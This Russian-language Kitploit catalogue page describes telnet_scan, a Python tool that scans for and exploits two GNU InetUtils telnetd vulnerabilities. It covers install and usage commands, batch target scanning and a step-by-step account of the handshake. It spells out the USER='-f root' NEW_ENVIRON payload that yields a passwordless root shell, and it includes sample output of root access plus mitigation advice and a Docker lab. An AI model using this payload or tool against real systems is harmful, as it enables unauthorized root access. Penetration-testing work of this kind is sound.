Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
telnet_scan — сканер/эксплойтер CVE-2026-24061 & CVE-2026-32746 | Kitploit
Инструменты/GitHubGitHub/ekomssavior/telnet_scan
Сканеры уязвимостейЭксплуатацияСетевая безопасностьТестирование на ПроникновениеАутентификацияОбучение и ОбразованиеЭксплуатация Бинарных ФайловЛаборатории и Практика
GitHubekomssavior/telnet_scan

telnet_scan

сканер/эксплойтер CVE-2026-24061 & CVE-2026-32746

Репозиторий
1163 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Сканер уязвимостей Telnet (CVE-2026-24061 и CVE-2026-32746)

License:ek0ms

Инструмент для оценки безопасности на Python, который обнаруживает и (где применимо) эксплуатирует две критические уязвимости в GNU InetUtils telnetd:

  • CVE-2026-24061 – Обход аутентификации через внедрение переменной окружения USER (CVSS 9.8)
  • CVE-2026-32746 – Переполнение буфера до аутентификации в обработчике LINEMODE SLC (CVSS 9.8)

Важное предупреждение

Этот инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей.
Несанкционированное использование против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, незаконно. Авторы не несут ответственности за неправомерное использование или ущерб, причинённый этим инструментом. Используйте на свой страх и риск.

image1(1)

Возможности

  • Сканирование одной цели – ввод IP-адресов или доменных имён во время выполнения
  • Пакетное сканирование – загрузка файла с несколькими целями (по одной на строку)
  • Выборочное тестирование – проверка каждой уязвимости по отдельности или обеих вместе
  • Эксплуатация CVE-2026-24061 – если уязвимость присутствует, инструмент предоставляет интерактивную оболочку root прямо в том же терминале
  • Обнаружение CVE-2026-32746 – определяет уязвимые системы с помощью контролируемого обнаружения сбоев
  • Чистая обработка терминала – оболочка в необработанном режиме с корректным восстановлением при выходе
  • Проверка подключения – различает заблокированные порты, отключённые службы и реальные уязвимости
  • Подробная отладка – установите TELNET_SCAN_VERBOSE=1, чтобы видеть каждый IAC-пакет и пошаговое описание эксплуатации
  • Лабораторная среда Docker – самодостаточная уязвимая цель для безопасного тестирования

Установка

root@kitploit:~
git clone https://github.com/ekomsSavior/telnet_scan.git
cd telnet_scan
chmod +x telnet_scanner.py

Использование

Базовый запуск

root@kitploit:~
python3 telnet_scanner.py

Лаборатория Docker (безопасное тестирование)

Протестируйте эксплойт на заведомо уязвимой цели, не рискуя реальными системами:

root@kitploit:~
cd lab
docker compose up -d
cd ..
python3 telnet_scanner.py
# Цель: 127.0.0.1, Порт: 2323

Лаборатория запускает уязвимый GNU InetUtils 2.5 telnetd в изолированном контейнере, привязанном только к localhost. Без доступа к сети.

Подробный режим

Отладка рукопожатия telnet и точное отображение происходящего на линии:

root@kitploit:~
TELNET_SCAN_VERBOSE=1 python3 telnet_scanner.py

Подробный вывод показывает:

  • Каждую отправленную и полученную команду IAC (DO/WILL/SB)
  • Расшифрованные названия опций telnet
  • Дампы полезной нагрузки в шестнадцатеричном виде для подпроверок
  • Пошаговый процесс эксплуатации (6-шаговое рукопожатие)

IMG_2498

Работа с одной целью

  1. Выберите опцию 1
  2. Введите цель (IP или домен, например, 192.168.1.100 или example.com)
  3. Укажите порт (по умолчанию 23, если оставить пустым)
  4. Выберите тип теста:
    • 1 – обе уязвимости
    • 2 – только CVE-2026-24061 (обход аутентификации)
    • 3 – только CVE-2026-32746 (переполнение буфера)

Пакетное сканирование

  1. Создайте файл с целями (по одной на строку) Пример targets.txt:
    root@kitploit:~
    192.168.1.100
    192.168.1.101
    10.0.0.50
    example.com
    # Это строка комментария – игнорируется
    
  2. Выберите опцию 2
  3. Введите имя файла
  4. Укажите порт (по умолчанию 23)
  5. Выберите тип теста (1, 2 или 3)
  6. Сканер:
    • Покажет прогресс для каждой цели
    • Отобразит результаты по мере завершения
    • Предоставит итоговую таблицу в конце

При получении оболочки

Если CVE-2026-24061 успешна:

  1. Уязвимость обнаружена
  2. Интерактивная оболочка root появляется непосредственно в том же окне терминала
  3. Вводите команды и сразу видите вывод (например, id, whoami, ls)
  4. Нажмите Ctrl+C, чтобы выйти из оболочки и вернуться в меню сканера
  5. При пакетном сканировании будет предложено выбрать: взаимодействовать с оболочкой или продолжить сканирование

Никакого отдельного терминала или дополнительных действий не требуется.

Как это работает

CVE-2026-24061 – Обход аутентификации

Эксплойт выполняет точное 6-шаговое рукопожатие telnet для обеспечения совместимости с реальным GNU InetUtils telnetd:

  1. Ожидание согласования сервера – до 15 секунд на обратный DNS и первоначальные опции DO
  2. Ответ WILL – подтверждение TTYPE, TSPEED, XDISPLOC, NEW_ENVIRON
  3. Ожидание SB SEND – запросы подпроверки от сервера
  4. Отправка полезной нагрузки эксплойта – установка USER="-f root" через подпроверку NEW_ENVIRON
  5. Обработка оставшихся обменов – ответы на DO/WILL для SGA, ECHO, LINEMODE, NAWS
  6. Обнаружение оболочки – поиск приглашения , или

Фоновый поток keepalive каждые 2 секунды отправляет IAC NOP, чтобы предотвратить обнаружение EOF функцией ttloop() в telnetd и вызов exit(1) до обработки полезной нагрузки.

Уязвимый telnetd передаёт -f root в /usr/bin/login, обходя аутентификацию и предоставляя немедленный доступ к оболочке root.

CVE-2026-32746 – Обнаружение переполнения буфера

  • Согласует опцию LINEMODE (RFC 1184)
  • Отправляет 500+ триплетов SLC (более 1500 байт) для переполнения буфера фиксированного размера
  • Отслеживает сбросы/сбои соединения для подтверждения уязвимости

Проверка подключения

  • Предварительное сканирование для проверки доступности службы перед попытками эксплуатации
  • Различает:
    • Заблокированные порты (брандмауэр блокирует)
    • Отключённые службы (служба не запущена)
    • Уязвимые службы (успешный эксплойт)

Пример вывода

Одиночная цель

root@kitploit:~
=== Telnet Vulnerability Scanner ===
1. Scan a single target
2. Scan targets from file (one IP/hostname per line)
3. Exit

Choose option: 1
Port (default 23): 

Which tests to run?
1. Both
2. Only CVE-2026-24061 (auth bypass - gives shell if vulnerable)
3. Only CVE-2026-32746 (buffer overflow detection)
Choice [1-3]: 1
Target (IP or domain): 192.168.1.100

[*] Resolved 192.168.1.100 -> 192.168.1.100
[*] Scanning 192.168.1.100:23...

[*] Checking if service is reachable...
[+] Service reachable

[*] Testing CVE-2026-24061 (authentication bypass)...
[!] CVE-2026-24061: VULNERABLE – shell obtained!

============================================================
[+] ROOT SHELL OBTAINED! You are now in an interactive root shell.
[+] Type commands directly here. Press Ctrl+C to exit shell.
============================================================

id
uid=0(root) gid=0(root) groups=0(root)

Вывод подробного режима (частично)

root@kitploit:~
    [STEP 1/6] Waiting for server negotiation (may take up to 15s)...
    [STEP 1/6] Got 48 bytes: fffb18fffb20fffb23fffb27...
           decoded: IAC DO TERMINAL-TYPE
           decoded: IAC DO TERMINAL-SPEED  
           decoded: IAC DO X-DISPLAY-LOCATION
           decoded: IAC DO NEW-ENVIRON
    [STEP 2/6] Responding WILL to all DO options
    [STEP 3/6] Waiting for SB SEND subnegotiation requests...
    [STEP 4/6] Sending subnegotiation responses...
               NEW-ENVIRON IS VAR USER VALUE "-f root"  *** EXPLOIT ***
    [STEP 5/6] Handling remaining option negotiations...
    [STEP 5/6] Text received: 'root@vuln-lab:~# '
    [RESULT] SUCCESS: Passwordless root login via USER="-f root" injection

Пакетное сканирование

root@kitploit:~
=== Telnet Vulnerability Scanner ===
1. Scan a single target
2. Scan targets from file (one IP/hostname per line)
3. Exit

Choose option: 2
Port (default 23): 
Enter filename with targets (one per line): targets.txt

Which tests to run?
1. Both
2. Only CVE-2026-24061 (auth bypass - gives shell if vulnerable)
3. Only CVE-2026-32746 (buffer overflow detection)
Choice [1-3]: 1

[*] Loaded 3 targets from targets.txt

==================================================
[1/3] Scanning 192.168.1.100:23
==================================================
[*] Resolved 192.168.1.100 -> 192.168.1.100
[+] Service reachable

[*] Testing CVE-2026-24061...
[!] CVE-2026-24061: VULNERABLE – shell obtained!

[?] Shell obtained! Interact now? (y/N): n

[*] Testing CVE-2026-32746...
[+] Server did not crash; likely not vulnerable

==================================================
[2/3] Scanning 192.168.1.101:23
==================================================
[-] Service not reachable on 192.168.1.101:23

==================================================
[3/3] Scanning example.com:23
==================================================
[*] Resolved example.com -> 93.184.216.34
[+] Service reachable

[*] Testing CVE-2026-24061...
[+] No response received; may still be vulnerable

[*] Testing CVE-2026-32746...
[!] CVE-2026-32746: VULNERABLE (server crashed)

============================================================
SCAN SUMMARY
============================================================
192.168.1.100: VULNERABLE to CVE-2026-24061
192.168.1.101: Service unreachable
example.com: VULNERABLE to CVE-2026-32746
============================================================

Смягчение

Если вы обнаружили уязвимые системы, примените следующие исправления:

  1. Обновите GNU InetUtils до версии 2.8 или новее
  2. Отключите telnetd и заблокируйте TCP/23 на сетевых границах
  3. Ограничьте доступ только доверенными сетями
  4. Мониторьте логи на предмет подключений со значениями NEW_ENVIRON USER, начинающимися с -f

Разработка и тестирование

Лаборатория Docker

Прилагаемый каталог lab/ предоставляет безопасную, воспроизводимую тестовую среду:

root@kitploit:~
cd lab
docker compose up -d
# Подождите ~10 секунд для инициализации telnetd
python3 ../telnet_scanner.py
# Цель: 127.0.0.1, Порт: 2323

Возможности лаборатории:

  • GNU InetUtils 2.5, скомпилированный из исходников (уязвимые версии)
  • telnetd запускается внутри изолированного контейнера
  • Привязан только к localhost:2323 – безопасно для разработки
  • Включает тестового пользователя (labuser:labpass123) для отладки

Остановите лабораторию по завершении:

root@kitploit:~
cd lab && docker compose down

Известные ограничения

  • Тест переполнения (CVE-2026-32746) может вызвать сбой уязвимой службы telnetd
  • Клавиши со стрелками и изменение размера терминала не полностью поддерживаются в интерактивной оболочке
  • Некоторые брандмауэры или сетевые конфигурации могут мешать согласованию опций Telnet
  • Пользователи Windows: интерактивная оболочка требует терминал, подобный Unix (WSL, Cygwin или Linux/macOS)

image0(2)

Благодарности

Особая благодарность @leetcrypt – Правильное 6-шаговое рукопожатие, поток keepalive, подробный режим и лаборатория Docker – это круто!


ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ: предназначено только для авторизованного тестирования безопасности и образовательных целей.

Скачать инструмент
#
root@
$